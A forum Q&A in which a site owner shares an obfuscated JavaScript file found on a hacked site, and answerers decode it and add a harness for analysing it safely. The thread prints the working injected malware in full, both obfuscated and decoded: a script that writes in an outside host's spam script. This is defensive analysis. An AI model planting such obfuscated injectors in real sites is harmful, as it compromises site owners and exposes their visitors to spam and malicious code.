Very interesting Javascript Obfuscation. Help understanding it


I found out one of my sites was hacked, and upon investigation, I looked at a javascript file that was uploaded and I couldn't believe that it actually served a purpose due to the insane obfuscation.

I'm so intrigued with it that I need to know how the hell this even works. If anyone can provide any information that is greatly appreciated! Plus this will help me find out other hidden hacked files on my server!

Here are the contents:

$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"=\\\\\\\"\\"+$.__$+$.$_$+$.___+$.__+$.__+"\\"+$.__$+$.$$_+$.___+"://"+$.$$_$+"\\"+$.__$+$.$_$+$.$$_+"\\"+$.__$+$.$$_+$._$$+"-\\"+$.__$+$.$$_+$._$$+$.$$$_+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$$_+$.$$_+$.$$$_+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.___+$._$+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"."+$.$$__+$._$+"\\"+$.__$+$.$_$+$.$_$+"/\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.__$+$.$$_+$._$$+"/"+$.__+"\\"+$.__$+$.$$_+$._$_+$.$_$_+"\\"+$.__$+$.$_$+$.$_$+$.$_$_+$.$$_$+$._$+(![]+"")[$._$_]+"/\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$_$+$.__$+$.$$_$+$.$$$_+$.$_$$+$.$_$_+"\\"+$.__$+$.$$_+$._$_+".\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"\\\\\\\"></\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+">\\\");"+"\"")())();
2

There are 2 answers

2
sbking On

I ran it in the console - it seems to replace the website's HTML with spam links trying to sell drugs - "Generic Viagra $108" etc.


2
Paul Draper On

First, add some whitespace:

$ = ~ [];
$ = {
    ___: ++$,
    $$$$: (![] + "")[$],
    __$: ++$,
    $_$_: (![] + "")[$],
    _$_: ++$,
    $_$$: ({} + "")[$],
    $$_$: ($[$] + "")[$],
    _$$: ++$,
    $$$_: (!"" + "")[$],
    $__: ++$,
    $_$: ++$,
    $$__: ({} + "")[$],
    $$_: ++$,
    $$$: ++$,
    $___: ++$,
    $__$: ++$
};
$.$_ = ($.$_ = $ + "")[$.$_$]
    + ($._$ = $.$_[$.__$])
    + ($.$$ = ($.$ + "")[$.__$])
    + ((!$) + "")[$._$$]
    + ($.__ = $.$_[$.$$_])
    + ($.$ = (!"" + "")[$.__$])
    + ($._ = (!"" + "")[$._$_])
    + $.$_[$.$_$]
    + $.__
    + $._$
    + $.$;
$.$$ = $.$
    + (!"" + "")[$._$$]
    + $.__
    + $._
    + $.$
    + $.$$;
$.$ = ($.___)[$.$_][$.$_];
$.$($.$(
    $.$$
    + "\"" + $.$$_$ + $._$ + $.$$__ + $._
    + "\\" + $.__$ + $.$_$ + $.$_$ + $.$$$_
    + "\\" + $.__$ + $.$_$ + $.$$_ + $.__
    + ".\\" + $.__$ + $.$$_ + $.$$$
    + "\\" + $.__$ + $.$$_ + $._$_
    + "\\" + $.__$ + $.$_$ + $.__$ + $.__ + $.$$$_
    + "(\\\"<\\" + $.__$ + $.$$_ + $._$$ + $.$$__
    + "\\" + $.__$ + $.$$_ + $._$_
    + "\\" + $.__$ + $.$_$ + $.__$
    + "\\" + $.__$ + $.$$_ + $.___ + $.__
    + "\\" + $.$__ + $.___
    + "\\" + $.__$ + $.$$_ + $._$$
    + "\\" + $.__$ + $.$$_ + $._$_ + $.$$__
    + "=\\\\\\\"\\" + $.__$ + $.$_$ + $.___ + $.__ + $.__
    + "\\" + $.__$ + $.$$_ + $.___ + "://" + $.$$_$
    + "\\" + $.__$ + $.$_$ + $.$$_
    + "\\" + $.__$ + $.$$_ + $._$$
    + "-\\" + $.__$ + $.$$_ + $._$$ + $.$$$_
    + "\\" + $.__$ + $.$$_ + $._$_
    + "\\" + $.__$ + $.$$_ + $.$$_ + $.$$$_
    + "\\" + $.__$ + $.$$_ + $._$_
    + "\\" + $.__$ + $.$_$ + $.___ + $._$
    + "\\" + $.__$ + $.$_$ + $.$_$ + $.$$$_ + "." + $.$$__ + $._$
    + "\\" + $.__$ + $.$_$ + $.$_$
    + "/\\" + $.__$ + $.$$_ + $._$$ + $.$$__
    + "\\" + $.__$ + $.$$_ + $._$_
    + "\\" + $.__$ + $.$_$ + $.__$
    + "\\" + $.__$ + $.$$_ + $.___ + $.__
    + "\\" + $.__$ + $.$$_ + $._$$
    + "/" + $.__
    + "\\" + $.__$ + $.$$_ + $._$_ + $.$_$_
    + "\\" + $.__$ + $.$_$ + $.$_$ + $.$_$_ + $.$$_$ + $._$ + (![] + "")[$._$_]
    + "/\\" + $.__$ + $.$$_ + $._$$ + "\\" + $.__$ + $.$_$ + $.__$ + $.$$_$ + $.$$$_ + $.$_$$ + $.$_$_
    + "\\" + $.__$ + $.$$_ + $._$_ + ".\\" + $.__$ + $.$_$ + $._$_
    + "\\" + $.__$ + $.$$_ + $._$$
    + "\\\\\\\"></\\"
    + $.__$ + $.$$_ + $._$$ + $.$$__
    + "\\" + $.__$ + $.$$_ + $._$_
    + "\\" + $.__$ + $.$_$ + $.__$
    + "\\" + $.__$ + $.$$_ + $.___ + $.__
    + ">\\\");"
    + "\""
)())();

1. Everything but the last statement is creating the object $ whose values are mostly numbers and strings, like "f", 8, and "return".

Of particular significance, however, is $.$, which is Function. Calling Function(s) creates a function whose body is s.

For example, Function('return 1;') returns function() { return 1; }.

Essentially, Function(s)() (or in this case, $.$(s)()) is the equivalent of eval(s).

2. All the string concatenations in that last statement create a string.

return"docu\155e\156t.\167\162\151te(\"<\163c\162\151\160t\40\163\162c=\\\"\150tt\160://d\156\163-\163e\162\166e\162\150o\155e.co\155/\163c\162\151\160t\163/t\162a\155adol/\163\151deba\162.\152\163\\\"></\163c\162\151\160t>\");\"

3. which when evaluated with $.$ returns as a string

document.write("<script src=\"http://dns-serverhome.com/scripts/tramadol/sidebar.js\"></script>");

4. Calling $.$ a second time on this result completes the attack.

This code is clearly intended to appear as innocuous as possible, by not using eval, Function, function, or any HTML entities like <.

The double call to Function is, IMO, not necessary, but I suppose it further obfuscates the code.

Now, as to your final question, do you intend to be running 3rd party Javascript? If so, the only robust framework I know of for something like that is Google Caja.

EDIT: This appears to be the result of jjencode for

document.write("<script src=\"http://dns-serverhome.com/scripts/tramadol/sidebar.js\"></script>");

jjencode even has the option to return a palindromic obfuscation.
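The Function-as-eval point (items 1 and 4 above) is also what lets an analyst recover the payload without executing it. As an added example that is not part of either answer, this Node.js harness temporarily swaps Function.prototype.constructor, the property that $.$ = (0)["constructor"]["constructor"] resolves to, for a trap: bodies that are nothing but return "<string literal>" are compiled (they can only yield a string, here the decoded document.write line), and every other body is logged and replaced by a no-op. The names JJENCODE_SAMPLE, analyzeUntrusted and LITERAL_RETURN are mine; the sample string is the code from the question.

```javascript
// Added example: decode what a jjencode payload hands to Function, without running it.
// Assumption: the payload reaches Function through Function.prototype.constructor,
// as the question's $.$ = (0)["constructor"]["constructor"] does.
const RealFunction = Function;

// Matches exactly   return "<string literal>" [;]   and nothing else. A body of this
// shape can only return a string, so compiling it merely decodes the literal
// (including the legacy octal escapes such as \155 that jjencode emits).
const LITERAL_RETURN = /^\s*return\s*"((?:[^"\\\n]|\\.)*)"\s*;?\s*$/;

function analyzeUntrusted(source) {
  const captured = [];
  const trap = function (...args) {
    const body = args.length ? String(args[args.length - 1]) : "";
    if (LITERAL_RETURN.test(body)) {
      const value = RealFunction(body)();          // safe: bare string literal
      captured.push({ kind: "literal", body, value });
      return () => value;                          // hand the decoded string back
    }
    captured.push({ kind: "blocked", body });      // this is the real payload
    return () => undefined;                        // attacker code never executes
  };
  const saved = Function.prototype.constructor;
  Function.prototype.constructor = trap;
  try {
    RealFunction(source)();   // only the character-table scaffolding actually runs
  } finally {
    Function.prototype.constructor = saved;
  }
  return captured;
}

// The obfuscated file from the question, verbatim (String.raw keeps its backslashes).
const JJENCODE_SAMPLE = String.raw`$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"=\\\\\\\"\\"+$.__$+$.$_$+$.___+$.__+$.__+"\\"+$.__$+$.$$_+$.___+"://"+$.$$_$+"\\"+$.__$+$.$_$+$.$$_+"\\"+$.__$+$.$$_+$._$$+"-\\"+$.__$+$.$$_+$._$$+$.$$$_+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$$_+$.$$_+$.$$$_+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.___+$._$+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"."+$.$$__+$._$+"\\"+$.__$+$.$_$+$.$_$+"/\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.__$+$.$$_+$._$$+"/"+$.__+"\\"+$.__$+$.$$_+$._$_+$.$_$_+"\\"+$.__$+$.$_$+$.$_$+$.$_$_+$.$$_$+$._$+(![]+"")[$._$_]+"/\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$_$+$.__$+$.$$_$+$.$$$_+$.$_$$+$.$_$_+"\\"+$.__$+$.$$_+$._$_+".\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"\\\\\\\"></\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+">\\\");"+"\"")())();`;

for (const entry of analyzeUntrusted(JJENCODE_SAMPLE)) {
  console.log(entry.kind + ":", entry.kind === "literal" ? entry.value : entry.body);
}
```

The first Function call is the inner $.$(...) and yields the decoded string; the second is the outer call whose body is the document.write line, which the trap logs as blocked instead of running.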